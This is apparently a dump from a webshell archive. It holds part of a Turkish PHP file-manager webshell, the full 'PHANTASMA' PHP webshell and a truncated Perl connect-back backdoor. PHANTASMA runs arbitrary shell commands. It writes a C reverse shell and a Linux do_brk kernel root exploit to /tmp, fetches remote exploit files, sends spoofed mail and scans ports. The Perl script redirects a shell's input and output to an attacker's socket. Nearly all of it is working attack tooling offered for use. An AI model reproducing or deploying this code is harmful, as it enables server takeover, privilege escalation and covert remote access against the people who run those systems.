<a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
<tr>
<td width="30" height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
<td height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya
Adý</font></td>
<td width="122" height="17" bgcolor="#9F9F9F">
<p align="center">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
</tr>
</table>
<?
if ($sedat=@opendir($dizin)){
while (($ekinci=readdir ($sedat))){
if (is_dir("$dizin/$ekinci")){
?>
<? if ($ekinci=="." or $ekinci=="..") {
} else {
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
<tr>
<td width="30" height="17" bgcolor="#808080">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
<td height="17" bgcolor="#C4C4C4">
<font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
<font color="#000000">Aç</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
<font color="#000000">Sil</font></a>
</font></td>
</tr>
</table>
</td>
</tr>
</table>
<?
}
?>
<?
}}}
closedir($sedat);
?>
<?
if ($sedat=@opendir($dizin)){
while (($ekinci=readdir ($sedat))){
if (is_file("$dizin/$ekinci")){
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
<tr>
<td width="30" height="1" bgcolor="#B0B0B0">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
<td height="1" bgcolor="#EAEAEA">
<font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
<font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( XXX )&nbsp;</font></td>
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
<tr>
<td width="100%" bgcolor="#D6D6D6"
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
<font color="#000000">Düzenle</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
<tr>
<td width="100%" bgcolor="#D6D6D6" no wrap
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
<font color="#000000">Sil</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
<?
}}}
closedir($sedat);
?>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
</table>
<tr>
<td width="100%" bgcolor="#000000">
</body></html><? } ?><? } ?><? } ?><? } ?>

634
138shell/P/PHANTASMA.txt Normal file
View file

@ -0,0 +1,634 @@
<CENTER>
<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
<BR>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
<?php
//
closelog( );
$dono = get_current_user( );
$ver = phpversion( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
</TABLE>
<BR>
<?php
if ($cmd != "") {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
?>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
<?php
if ($fe == 1){
$fe = "exec";
}
if ($fe == ""){
$fe = "passthru";
}
if ($fe == "2"){
$fe = "system";
}
if (isset($chdir)) @chdir($chdir);
ob_start( );
$fe("$cmd 2>&1");
$output = ob_get_contents();
ob_end_clean( );
?>
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
<?php
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</TEXTAREA>
<BR>
<?php
}
if ($safemode != "") {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
?>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
<?php
if ($dir = @opendir($chdir)) {
echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
echo "<TR>";
echo "<TD valign=top>";
echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
while (($file = readdir($dir)) !== false) {
if (@is_file($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
// echo "<font color=green>$file1 - $file2 - $file </font><br>";
flush( );
}
}
echo "</TD>";
echo"<TD valign=top>";
echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
if ($dir = @opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_dir($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>";
// echo "<font color=blue>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo"<TD valign=top>";
echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
if ($dir = @opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_writable($file) && @is_dir($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=red>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo "</TD>";
echo "<TD valign=top>";
echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
if ($dir = opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_writable($file) && @is_file($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=red>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo "</TR>";
echo "</TABLE>";
}
}
?>
<?php
if ($shell == "write") {
$shell = "#include <stdio.h>\n" .
"#include <sys/socket.h>\n" .
"#include <netinet/in.h>\n" .
"#include <arpa/inet.h>\n" .
"#include <netdb.h>\n" .
"int main(int argc, char **argv) {\n" .
" char *host;\n" .
" int port = 80;\n" .
" int f;\n" .
" int l;\n" .
" int sock;\n" .
" struct in_addr ia;\n" .
" struct sockaddr_in sin, from;\n" .
" struct hostent *he;\n" .
" char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
" \"For More Reliable Shell.\\n\"\n" .
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
" printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
" if (argc < 2 || argc > 3) {\n" .
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
" return 1;\n" .
" }\n" .
" printf(\"[*] Dumping Arguments\\n\");\n" .
" l = strlen(argv[1]);\n" .
" if (l <= 0) {\n" .
" printf(\"[-] Invalid Host Name\\n\");\n" .
" return 1;\n" .
" }\n" .
" if (!(host = (char *) malloc(l))) {\n" .
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
" return 1;\n" .
" }\n" .
" strncpy(host, argv[1], l);\n" .
" if (argc == 3) {\n" .
" port = atoi(argv[2]);\n" .
" if (port <= 0 || port > 65535) {\n" .
" printf(\"[-] Invalid Port Number\\n\");\n" .
" return 1;\n" .
" }\n" .
" }\n" .
" printf(\"[*] Resolving Host Name\\n\");\n" .
" he = gethostbyname(host);\n" .
" if (he) {\n" .
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
" return 1;\n" .
" }\n" .
" sin.sin_family = PF_INET;\n" .
" sin.sin_addr.s_addr = ia.s_addr;\n" .
" sin.sin_port = htons(port);\n" .
" printf(\"[*] Connecting...\\n\");\n" .
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
" printf(\"[-] Socket Error\\n\");\n" .
" return 1;\n" .
" }\n" .
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
" printf(\"[-] Unable to Connect\\n\");\n" .
" return 1;\n" .
" }\n" .
" printf(\"[*] Spawning Shell\\n\");\n" .
" f = fork( );\n" .
" if (f < 0) {\n" .
" printf(\"[-] Unable to Fork\\n\");\n" .
" return 1;\n" .
" } else if (!f) {\n" .
" write(sock, msg, sizeof(msg));\n" .
" dup2(sock, 0);\n" .
" dup2(sock, 1);\n" .
" dup2(sock, 2);\n" .
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
" close(sock);\n" .
" return 0;\n" .
" }\n" .
" printf(\"[*] Detached\\n\\n\");\n" .
" return 0;\n" .
"}\n";
$fp = fopen("/tmp/dc-connectback.c", "w");
$ok = fwrite($fp, $shell);
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
}
}
if ($kernel == "write") {
$kernel = "/*\n" .
" * hatorihanzo.c\n" .
" * Linux kernel do_brk vma overflow exploit.\n" .
" *\n" .
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
" *\n" .
" * Further research and exploit development by\n" .
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
" *\n" .
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
" *\n" .
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
"*/\n" .
"#define _GNU_SOURCE\n" .
"#include <stdio.h>\n" .
"#include <stdlib.h>\n" .
"#include <errno.h>\n" .
"#include <string.h>\n" .
"#include <unistd.h>\n" .
"#include <fcntl.h>\n" .
"#include <signal.h>\n" .
"#include <paths.h>\n" .
"#include <grp.h>\n" .
"#include <setjmp.h>\n" .
"#include <stdint.h>\n" .
"#include <sys/mman.h>\n" .
"#include <sys/ipc.h>\n" .
"#include <sys/shm.h>\n" .
"#include <sys/ucontext.h>\n" .
"#include <sys/wait.h>\n" .
"#include <asm/ldt.h>\n" .
"#include <asm/page.h>\n" .
"#include <asm/segment.h>\n" .
"#include <linux/unistd.h>\n" .
"#include <linux/linkage.h>\n" .
"#define kB * 1024\n" .
"#define MB * 1024 kB\n" .
"#define GB * 1024 MB\n" .
"#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" .
"#define ENTRY_MAGIC 0\n" .
"#define ENTRY_GATE 2\n" .
"#define ENTRY_CS 4\n" .
"#define ENTRY_DS 6\n" .
"#define CS ((ENTRY_CS << 2) | 4)\n" .
"#define DS ((ENTRY_DS << 2) | 4)\n" .
"#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" .
"#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
"#define TOP_ADDR 0xFFFFE000U\n" .
"/* configuration */\n" .
"unsigned task_size;\n" .
"unsigned page;\n" .
"uid_t uid;\n" .
"unsigned address;\n" .
"int dontexit = 0;\n" .
"void fatal(char * msg)\n" .
"{\n" .
" fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
" if (dontexit) {\n" .
" fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
" kill(getpid(), SIGSTOP);\n" .
" for (;;) pause();\n" .
" }\n" .
" exit(EXIT_FAILURE);\n" .
"}\n" .
"void configure(void)\n" .
"{\n" .
" unsigned val;\n" .
" task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
" uid = getuid();\n" .
"}\n" .
"void expand(void)\n" .
"{\n" .
" unsigned top = (unsigned) sbrk(0);\n" .
" unsigned limit = address + PAGE_SIZE;\n" .
" do {\n" .
" if (sbrk(PAGE_SIZE) == NULL)\n" .
" fatal(\"Kernel seems not to be vulnerable\");\n" .
" dontexit = 1;\n" .
" top += PAGE_SIZE;\n" .
" } while (top < limit);\n" .
"}\n" .
"jmp_buf jmp;\n" .
"#define MAP_NOPAGE 1\n" .
"#define MAP_ISPAGE 2\n" .
"void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
"{\n" .
" struct ucontext * uc = (struct ucontext *) ptr;\n" .
" int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
" (void)signo;\n" .
" (void)si;\n" .
" error_code = MAP_NOPAGE + (error_code & 1);\n" .
" longjmp(jmp, error_code);\n" .
"}\n" .
"void prepare(void)\n" .
"{\n" .
" struct sigaction sa;\n" .
" sa.sa_sigaction = sigsegv;\n" .
" sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
" sigemptyset(&sa.sa_mask);\n" .
" sigaction(SIGSEGV, &sa, NULL);\n" .
"}\n" .
"int testaddr(unsigned addr)\n" .
"{\n" .
" int val;\n" .
" val = setjmp(jmp);\n" .
" if (val == 0) {\n" .
" asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
" return MAP_ISPAGE;\n" .
" }\n" .
" return val;\n" .
"}\n" .
"#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
"#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
"#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
"void map(unsigned * map)\n" .
"{\n" .
" unsigned addr = task_size;\n" .
" unsigned bit = 1;\n" .
" prepare();\n" .
" while (addr < TOP_ADDR) {\n" .
" if (testaddr(addr) == MAP_ISPAGE)\n" .
" *map |= bit;\n" .
" addr += PAGE_SIZE;\n" .
" next(map, bit);\n" .
" }\n" .
" signal(SIGSEGV, SIG_DFL);\n" .
"}\n" .
"void find(unsigned * m)\n" .
"{\n" .
" unsigned addr = task_size;\n" .
" unsigned bit = 1;\n" .
" unsigned count;\n" .
" unsigned tmp;\n" .
" prepare();\n" .
" tmp = address = count = 0U;\n" .
" while (addr < TOP_ADDR) {\n" .
" int val = testaddr(addr);\n" .
" if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
" if (!tmp) tmp = addr;\n" .
" count++;\n" .
" } else {\n" .
" if (tmp && count == LDT_PAGES) {\n" .
" errno = EAGAIN;\n" .
" if (address)\n" .
" fatal(\"double allocation\\n\");\n" .
" address = tmp;\n" .
" }\n" .
" tmp = count = 0U;\n" .
" }\n" .
" addr += PAGE_SIZE;\n" .
" next(m, bit);\n" .
" }\n" .
" signal(SIGSEGV, SIG_DFL);\n" .
" if (address)\n" .
" return;\n" .
" errno = ENOTSUP;\n" .
" fatal(\"Unable to determine kernel address\");\n" .
"}\n" .
"int modify_ldt(int, void *, unsigned);\n" .
"void ldt(unsigned * m)\n" .
"{\n" .
" struct modify_ldt_ldt_s l;\n" .
" map(m);\n" .
" memset(&l, 0, sizeof(l));\n" .
" l.entry_number = LDT_ENTRIES - 1;\n" .
" l.seg_32bit = 1;\n" .
" l.base_addr = MAGIC >> 16;\n" .
" l.limit = MAGIC & 0xffff;\n" .
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
" fatal(\"Unable to set up LDT\");\n" .
" l.entry_number = ENTRY_MAGIC / 2;\n" .
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
" fatal(\"Unable to set up LDT\");\n" .
" find(m);\n" .
"}\n" .
"asmlinkage void kernel(unsigned * task)\n" .
"{\n" .
" unsigned * addr = task;\n" .
" /* looking for uids */\n" .
" while (addr[0] != uid || addr[1] != uid ||\n" .
" addr[2] != uid || addr[3] != uid)\n" .
" addr++;\n" .
" addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" .
" addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" .
" addr[8] = 0;\n" .
" /* looking for vma */\n" .
" for (addr = (unsigned *) task_size; addr; addr++) {\n" .
" if (addr[0] >= task_size && addr[1] < task_size &&\n" .
" addr[2] == address && addr[3] >= task_size) {\n" .
" addr[2] = task_size - PAGE_SIZE;\n" .
" addr = (unsigned *) addr[3];\n" .
" addr[1] = task_size - PAGE_SIZE;\n" .
" addr[2] = task_size;\n" .
" break;\n" .
" }\n" .
" }\n" .
"}\n" .
"void kcode(void);\n" .
"#define __str(s) #s\n" .
"#define str(s) __str(s)\n" .
"void __kcode(void)\n" .
"{\n" .
" asm(\n" .
" \"kcode: \\n\"\n" .
" \" pusha \\n\"\n" .
" \" pushl %es \\n\"\n" .
" \" pushl %ds \\n\"\n" .
" \" movl $(\" str(DS) \") ,%edx \\n\"\n" .
" \" movl %edx,%es \\n\"\n" .
" \" movl %edx,%ds \\n\"\n" .
" \" movl $0xffffe000,%eax \\n\"\n" .
" \" andl %esp,%eax \\n\"\n" .
" \" pushl %eax \\n\"\n" .
" \" call kernel \\n\"\n" .
" \" addl $4, %esp \\n\"\n" .
" \" popl %ds \\n\"\n" .
" \" popl %es \\n\"\n" .
" \" popa \\n\"\n" .
" \" lret \\n\"\n" .
" );\n" .
"}\n" .
"void knockout(void)\n" .
"{\n" .
" unsigned * addr = (unsigned *) address;\n" .
" if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
" fatal(\"Unable to change page protection\");\n" .
" errno = ESRCH;\n" .
" if (addr[ENTRY_MAGIC] != MAGIC)\n" .
" fatal(\"Invalid LDT entry\");\n" .
" /* setting call gate and privileged descriptors */\n" .
" addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
" addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
" addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
" addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
" addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" .
" addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
" prepare();\n" .
" if (setjmp(jmp) != 0) {\n" .
" errno = ENOEXEC;\n" .
" fatal(\"Unable to jump to call gate\");\n" .
" }\n" .
" asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" .
"}\n" .
"void shell(void)\n" .
"{\n" .
" char * argv[] = { _PATH_BSHELL, NULL };\n" .
" execve(_PATH_BSHELL, argv, environ);\n" .
" fatal(\"Unable to spawn shell\\n\");\n" .
"}\n" .
"void remap(void)\n" .
"{\n" .
" static char stack[8 MB]; /* new stack */\n" .
" static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
" static unsigned * m;\n" .
" static unsigned b;\n" .
" m = (unsigned *) sbrk(map_size);\n" .
" if (!m)\n" .
" fatal(\"Unable to allocate memory\");\n" .
" environ = envp;\n" .
" asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
" b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
" if (munmap((void*)b, task_size - b) == -1)\n" .
" fatal(\"Unable to unmap stack\");\n" .
" while (b < task_size) {\n" .
" if (sbrk(PAGE_SIZE) == NULL)\n" .
" fatal(\"Unable to expand BSS\");\n" .
" b += PAGE_SIZE;\n" .
" }\n" .
" ldt(m);\n" .
" expand();\n" .
" knockout();\n" .
" shell();\n" .
"}\n" .
"int main(void)\n" .
"{\n" .
" configure();\n" .
" remap();\n" .
" return EXIT_FAILURE;\n" .
"}\n";
$fp = fopen("/tmp/xpl_brk.c", "w");
$ok = fwrite($fp, $kernel);
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
}
}
?>
</CENTER>
<pre><font face="Tahoma" size="2">
<?php
// Function to Visualize Source Code files
if ($see != "") {
$fp = fopen($see, "r");
$read = fread($fp, 30000);
echo "============== $see ================<br>";
echo "<textarea name=textarea cols=80 rows=15>";
echo "$read";
Echo "</textarea>";
}
// Function to Dowload Local Xploite Binary COde or Source Code
if ($dx != "") {
$fp = @fopen("$hostxpl",r);
$fp2 = @fopen("$storage","w");
fwrite($fp2, "");
$fp1 = @fopen("$storage","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
}
}
flush( );
// Function to visulize Format Color Source Code PHP
if ($sfc != "") {
$showcode = show_source("$sfc");
echo "<font size=4> $showcode </font>";
}
// Function to Visualize all infomation files
if ($fileinfo != "") {
$infofile = stat("$fileanalize");
while (list($info, $value) = each ($infofile)) {
echo" Info: $info Value: $value <br>";
}
}
// Function to send fake mail
if ($fake == 1) {
echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
echo "</FORM>";
}
if($send == 1) {
if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
}
}
if ($portscan != "") {
$port = array ("21","22","23","25","110",);
$values = count($port);
for ($cont=0; $cont < $values; $cont++) {
@$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
$service = Getservbyport($port[$cont],"tcp");
@$get = fgets($sock[$cont]);
echo "<br>Port: $port[$cont] - Service: $service<br><br>";
echo "<br>Banner: $get <br><br>";
flush();
}
}
?>
</font></pre>

61
138shell/P/PHP Backdoor Connect.pl.txt Normal file
View file

@ -0,0 +1,61 @@
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
